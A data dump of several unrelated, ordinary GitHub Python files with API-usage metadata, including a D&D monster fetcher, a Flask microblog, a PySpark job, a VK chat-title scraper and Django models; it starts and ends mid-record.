"librosa.display.filters", "line_number": 405, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 405, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 412, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 453, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 462, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 508, "usage_type": "call"}, {"api_name": "os.path", "line_number": 508, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 512, "usage_type": "call"}, {"api_name": "os.path", "line_number": 512, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 519, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 521, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 521, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 543, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 547, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 547, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 548, "usage_type": "call"}, {"api_name": "os.path", "line_number": 548, "usage_type": "attribute"}, {"api_name": "librosa.display.feature", "line_number": 555, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "numpy.rot90", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.rot90", "line_number": 643, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 652, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 652, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 653, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 653, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 654, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 654, "usage_type": "name"}, {"api_name": "librosa.display.load", "line_number": 658, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 658, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 659, "usage_type": "call"}, {"api_name": "os.path", "line_number": 659, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 661, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 661, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 682, "usage_type": "call"}, {"api_name": "os.path", "line_number": 682, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 694, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 695, "usage_type": "call"}, {"api_name": "librosa.display.effects.trim", "line_number": 710, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 710, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 710, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 724, "usage_type": "call"}, {"api_name": "os.path", "line_number": 724, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 743, "usage_type": "name"}, {"api_name": "constants.base_data_path", "line_number": 745, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 747, "usage_type": "call"}, {"api_name": "os.path", "line_number": 747, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 747, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 752, "usage_type": "call"}, {"api_name": "os.path", "line_number": 752, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 753, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 756, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 757, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 759, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 782, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 783, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 784, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 790, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 792, "usage_type": "call"}, {"api_name": "os.path", "line_number": 792, "usage_type": "attribute"}, {"api_name": "librosa.display.load", "line_number": 805, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 805, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 807, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 807, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 807, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 818, "usage_type": "call"}, {"api_name": "os.path", "line_number": 818, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 819, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 820, "usage_type": "call"}, {"api_name": "os.path", "line_number": 820, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 822, "usage_type": "call"}, {"api_name": "os.path", "line_number": 822, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 844, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 864, "usage_type": "call"}, {"api_name": "os.path", "line_number": 864, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 865, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 871, "usage_type": "call"}, {"api_name": "os.path", "line_number": 871, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 873, "usage_type": "call"}, {"api_name": "os.path", "line_number": 873, "usage_type": "attribute"}, {"api_name": "soundfile.SoundFile", "line_number": 874, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 885, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 890, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path", "line_number": 901, "usage_type": "attribute"}, {"api_name": "joblib.delayed", "line_number": 911, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 923, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 967, "usage_type": "call"}, {"api_name": "os.path", "line_number": 967, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 975, "usage_type": "call"}, {"api_name": "os.path", "line_number": 975, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 976, "usage_type": "call"}, {"api_name": "os.path", "line_number": 976, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 976, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 977, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 983, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 984, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 984, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 984, "usage_type": "call"}, {"api_name": "os.path", "line_number": 984, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 988, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 988, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 988, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1012, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1014, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1014, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 1015, "usage_type": "call"}, {"api_name": "constants.base_data_path", "line_number": 1015, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1017, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1017, "usage_type": "attribute"}, {"api_name": "constants.base_data_path", "line_number": 1018, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1032, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1032, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 1039, "usage_type": "call"}, {"api_name": "librosa.display.load", "line_number": 1040, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 1040, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1040, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "librosa.display.effects.trim", "line_number": 1044, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 1044, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1044, "usage_type": "name"}, {"api_name": "librosa.display.feature.melspectrogram", "line_number": 1045, "usage_type": "call"}, {"api_name": "librosa.display.feature", "line_number": 1045, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 1045, "usage_type": "name"}, {"api_name": "constants.model_params", "line_number": 1047, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1065, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1065, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1067, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1068, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1068, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1070, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1070, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1083, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1084, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 1090, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1093, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1093, "usage_type": "attribute"}, {"api_name": "pydub.AudioSegment.from_wav", "line_number": 1094, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 1094, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 1098, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1103, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1110, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1111, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1114, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1122, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1129, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 1135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 1166, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1169, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1179, "usage_type": "call"}, {"api_name": "foundations.log_metric", "line_number": 1180, "usage_type": "call"}, {"api_name": "constants.model_params", "line_number": 1192, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1228, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1230, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1232, "usage_type": "call"}]}
+{"seq_id": "71567644649", "text": "import requests\r\nimport random\r\n\r\ndef monster():\r\n response2 = requests.get('http://www.dnd5eapi.co/api/monsters')\r\n a2 = response2.json()\r\n\r\n lista2 = a2['results']\r\n\r\n c = len(lista2) - 1\r\n monsters = []\r\n for item in lista2:\r\n monsters.append(lista2[c]['index'])\r\n c -= 1\r\n\r\n random_monster = random.choice(monsters)\r\n response3 = requests.get('http://www.dnd5eapi.co/api/monsters/'+ random_monster)\r\n d = response3.json()\r\n print('Name: {}, Type: {}, Hit points: {}, Hit dice: {}, Armor class: {}'.format(d['name'], d['type'], d['hit_points'], d['hit_dice'], d['armor_class']))\r\n\r\n\r\n\r\n", "repo_name": "Babalmar/D-D-Requests", "sub_path": "monsters.py", "file_name": "monsters.py", "file_ext": "py", "file_size_in_byte": 633, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 16, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "25705455774", "text": "from selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\n\r\ndriver = webdriver.Chrome(r'C:\\\\chromedriver_95.0.4638.54.exe')\r\ndriver.get(\"https://vk.com\")\r\n\r\nauth = input(\"Press any key when you have login to your page...\")\r\ncount = int(input(\"Enter how a lot of chats you wanna check (number): \"))\r\nkeyword = input(\"Enter keyword to find if you want: \")\r\n\r\nchats = {}\r\nfor x in range(1, count+1):\r\n try:\r\n driver.get(f\"https://vk.com/im?sel=c{x}\")\r\n sleep(2)\r\n \r\n element = driver.find_element_by_xpath('//a[@class=\"im-page--title-main-inner _im_page_peer_name\"]')\r\n chatname = element.get_attribute(\"innerHTML\").replace(\" \",\"\")\r\n chats[x]=chatname\r\n \r\n if keyword in chatname:\r\n exit()\r\n \r\n x+=1\r\n except Exception:\r\n pass\r\nwith open(\"chats.json\",\"w\", encoding='utf8') as file:\r\n json.dump(chats,file,ensure_ascii=False)", "repo_name": "syaveloo/demonstration", "sub_path": "chats/give_me_my_chats_vk.py", "file_name": "give_me_my_chats_vk.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "37094566010", "text": "#This program prints one date minus of the date provided to the user.\n#Give input as\n#1\tno of testcases\n#24 April 1994\ttest cases\nimport datetime\nfrom datetime import date, timedelta\nn = input();\nwhile n > 0:\n\tdate = raw_input(); day, month, year = date.split();\n\tassert(int(day) > 0 & int(day) < 31)\n\t#print(day+\" \"+month+\" \"+year)\n\tmap = {'January':1, 'February':2, 'March':3, 'April':4, 'May':5, 'June':6, 'July':7, 'August':8, 'September':9, \t\t'October':10, 'November':11, 'December':12}\n\tmlist = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', \t\t\t'December']\n\tmydate = (datetime.date(int(year), map[month], int(day))) #year, month, day\n\t#mydate =mydate+datetime.timedelta(years=40)\n\tmydate = mydate - datetime.timedelta(days = 1)\n\tmydate = mydate.isoformat();\n\t#print(mydate)\n\tyear, month, day = mydate.split('-')\n\t#print(year+\" \"+month+\" \"+day)\n\t#print(mydate.strftime(\"%Y-%m-%d\"))\n\t#year = mydate.strftime(\"%Y\");\n\tif(int(month) < 10):\tmonth = month.strip(\"0\");\n\t#day = mydate.strftime(\"%d\");\n\tif(int(day) < 10):\tday = day.strip(\"0\")\n\t#print(month);\n\tprint(day + \" \" + mlist[int(month) - 1] + \" \" + year);\n\tn -= 1;\n", "repo_name": "pushkarlaulkar/competitiveprogramming", "sub_path": "printpreviousdate.py", "file_name": "printpreviousdate.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.split", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "33753704375", "text": "# flaskr microblogging app\n\nimport dataset\n\nfrom flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\n\n# connecting to a SQLite database\ndb = dataset.connect('sqlite:///myflaskr.db')\ntable = db['postings']\n\n# create the application\napp = Flask(__name__)\n\n# show all the posting\n\n\n@app.route(\"/\")\ndef show_postings():\n postings = table.find() # to reverse order, table.find(order_by='-id')\n return render_template('show_postings.html', postings=postings)\n\n\n@app.route(\"/add\", methods=['POST']) # only accept connections which POST\ndef add_posting():\n table.insert(dict(title=request.form['title'], text=request.form['text']))\n flash(\"New posting successful\")\n return redirect(url_for('show_postings'))\n\nif __name__ == '__main__':\n app.debug = \"TRUE\"\n app.secret_key = \"secret\"\n app.run()\n", "repo_name": "oatnog/flaskr", "sub_path": "flaskr.py", "file_name": "flaskr.py", "file_ext": "py", "file_size_in_byte": 848, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataset.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "23876414383", "text": "#qzznb!\nfrom __future__ import print_function\nfrom pyspark import SparkContext\nimport json\ndef fun(record):\n if record[0] == 'a':\n return (record[2],record)\n elif record[0] == 'b':\n return (record[1],record)\n\ndef mul(lists):\n sz = len(lists)\n res = []\n for x in range(sz):\n for y in range(x+1,sz):\n #print(x,y)\n #print(lists[x][0],lists[y][0])\n \n if lists[x][0] == \"a\" and lists[y][0] == \"b\":\n res.append(((lists[x][1],lists[y][2]),lists[x][3]*lists[y][3]))\n elif lists[x][0] == \"b\" and lists[y][0] == \"a\":\n res.append(((lists[y][1],lists[x][2]),lists[x][3]*lists[y][3]))\n \n return res\n\nsc = SparkContext('local', 'test')\ntextFile = sc.textFile(\"file:///root/bigdata/inputs//6.json\")\nans = textFile.map(lambda row: fun(json.loads(row))).groupByKey().flatMap(lambda x: mul(list(x[1]))).reduceByKey(lambda x,y:x+y).map(lambda x: [[x[0][0],x[0][1]],x[1]])\nans.foreach(print)\n", "repo_name": "Ryan0v0/BUAA_BigDataCourse", "sub_path": "problem6/pyspark/problem6_spark.py", "file_name": "problem6_spark.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "21651703787", "text": "from helper.cEmbed import granted_msg, denied_msg\n\nclass LeaderBoard():\n def Standings(self, lst):\n i = 1\n ids = handles = ratings = \"\"\n for (h, r) in sorted(lst, key = lambda x: x[1], reverse = True):\n ids += \"**\" + str(i) + \"**\" +'\\n'\n if i == 1: handles += h + \":crown:\" + \"\\n\"\n else: handles += h + \"\\n\"\n ratings += str(r) + \"\\n\"\n i += 1\n\n if len(ids) == 0: return denied_msg(\"Warning\", \"The Leaderboard is Still Empty.\")\n\n response = granted_msg(\"CodeForces Standings\")\n\n response.add_field(name = \"#\", value = ids, inline = True)\n response.add_field(name = \"Handle\", value = handles, inline = True)\n response.add_field(name = \"Rating\", value = ratings, inline = True)\n\n return response\n", "repo_name": "KhaledChehabeddine/aub_cp_discord_bot", "sub_path": "helper/LeaderBoard.py", "file_name": "LeaderBoard.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "helper.cEmbed.denied_msg", "line_number": 14, "usage_type": "call"}, {"api_name": "helper.cEmbed.granted_msg", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "4931263659", "text": "import random\nimport string\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser, UserManager\n\n\nclass AdminManager(UserManager):\n def get_queryset(self):\n return super().get_queryset().filter(is_superuser=True)\n\n\nclass User(AbstractUser):\n class Type(models.IntegerChoices):\n USER = 0, 'Пользователь без прав'\n VERIFIED = 1, 'Пользователь'\n ADMIN = 2, 'Администратор'\n\n users = UserManager()\n admins = AdminManager()\n type = models.IntegerField(default=Type.USER, choices=Type.choices)\n date_of_birth = models.DateField(null=True)\n token = models.CharField(max_length=255, default='')\n\n def update_token(self):\n token = str()\n for _ in range(20):\n token += random.choice(string.ascii_letters+string.digits)\n\n self.token = token\n self.save()\n\n def __str__(self):\n return str(self.username)\n\n\nclass Platform(models.Model):\n platforms = models.Manager()\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Платформа'\n verbose_name_plural = 'Платформы'\n\n def __str__(self):\n return self.name\n\n\nclass Category(models.Model):\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='categories',\n verbose_name='Платформа',\n )\n name = models.CharField(\n max_length=255,\n unique=True,\n verbose_name='Название',\n )\n description = models.CharField(\n max_length=255,\n verbose_name='Описание категории',\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n to='self',\n on_delete=models.CASCADE,\n related_name='children',\n null=True,\n blank=True,\n verbose_name='Родитель',\n )\n xml_feed = models.CharField(\n max_length=255,\n verbose_name='Значение для XML фида',\n null=True,\n blank=True,\n )\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Категория'\n verbose_name_plural = 'Категории'\n\n def get_full_name(self):\n name_list = [self.name]\n parent = self.parent\n while parent:\n name_list.append(parent.name)\n parent = parent.parent\n\n full_name = ' - '.join(reversed(name_list))\n return full_name\n\n def __str__(self):\n return self.name\n\n\nclass Project(models.Model):\n uid = models.IntegerField()\n projects = models.Manager()\n platform = models.ForeignKey(\n to=Platform,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n user = models.ForeignKey(\n to=User,\n on_delete=models.CASCADE,\n related_name='projects',\n )\n name = models.CharField(max_length=255, verbose_name='Название')\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n\n class Meta:\n verbose_name = 'Проект'\n verbose_name_plural = 'Проекты'\n\n def __str__(self):\n return self.name\n\n\nclass ProjectCategory(models.Model):\n project = models.ForeignKey(\n to=Project,\n on_delete=models.CASCADE,\n related_name='categories',\n )\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n\n created = models.DateTimeField(auto_now_add=True,\n verbose_name='Дата создания')\n updated = models.DateTimeField(auto_now=True,\n verbose_name='Дата изменения')\n", "repo_name": "archon1999/PlatformXMLGenerator", "sub_path": "app/apps/backend/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4445, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.models.UserManager", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerChoices", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.UserManager", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 28, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 44, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 46, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 57, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 57, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 58, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 64, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 69, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 75, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 75, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 77, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 83, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 83, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 89, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 91, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 112, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 113, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 113, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 114, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 114, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 115, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 115, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 117, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 120, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": 